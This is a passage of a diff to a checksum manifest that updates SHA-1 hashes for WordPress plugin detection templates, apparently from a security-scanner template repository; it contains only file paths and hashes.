-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
-http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
-http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
-http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
-http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
-http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
-http/technologies/wordpress/plugins/instagram-feed.yaml:f4867c229ee945f162265d86e1e20f9e908f32da
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
-http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
-http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
-http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
-http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
-http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
-http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
-http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
-http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
-http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
+http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
+http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
+http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
+http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
+http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
+http/technologies/wordpress/plugins/instagram-feed.yaml:638a2ea1ff92407b33293b19f81421f64dcbbef2
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
+http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
+http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
+http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
+http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
+http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
+http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
+http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
+http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
+http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
 http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
-http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
-http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
-http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
-http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
-http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
-http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
-http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
-http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
-http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
-http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
-http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
-http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
-http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
-http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
-http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
+http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
+http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
+http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
+http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
+http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
+http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
+http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
+http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
+http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
+http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
+http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
+http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
+http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
+http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
+http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
-http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
-http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
-http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
-http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
-http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
-http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
-http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
-http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
-http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
-http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
-http/technologies/wordpress/plugins/sg-cachepress.yaml:8e1eabb506c0b746de758852d2b8980766a0b94c
-http/technologies/wordpress/plugins/sg-security.yaml:9052be594f4d2bffac320adf7b1a019f797528a5
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
+http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
+http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
+http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
+http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
+http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
+http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
+http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
+http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
+http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
+http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
+http/technologies/wordpress/plugins/sg-cachepress.yaml:cc889ada7c90d40cc71b72a0d9fc976cacfa3e85
+http/technologies/wordpress/plugins/sg-security.yaml:0ab396fbd10115bbd286e7c229ac887e727390b1
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
-http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
+http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
+http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
-http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
-http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
-http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
-http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
-http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
+http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
+http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
+http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
+http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
+http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
-http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
-http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
-http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
-http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
-http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
-http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
+http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
+http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
+http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
+http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
+http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
+http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
+http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
-http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
-http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
-http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
-http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
-http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
-http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
-http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
-http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
-http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
-http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
-http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
-http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
-http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
-http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
+http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
+http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
+http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
+http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
+http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
+http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
+http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
+http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
+http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
+http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
+http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
+http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
+http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
+http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
+http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7196,7 +7196,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:4ab8febf89a2dc55e45b5f4bf1f21a2c062e5bf9
+templates-checksum.txt:144ebb428fcb7a4643ed1641dc6e2336705118d4
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
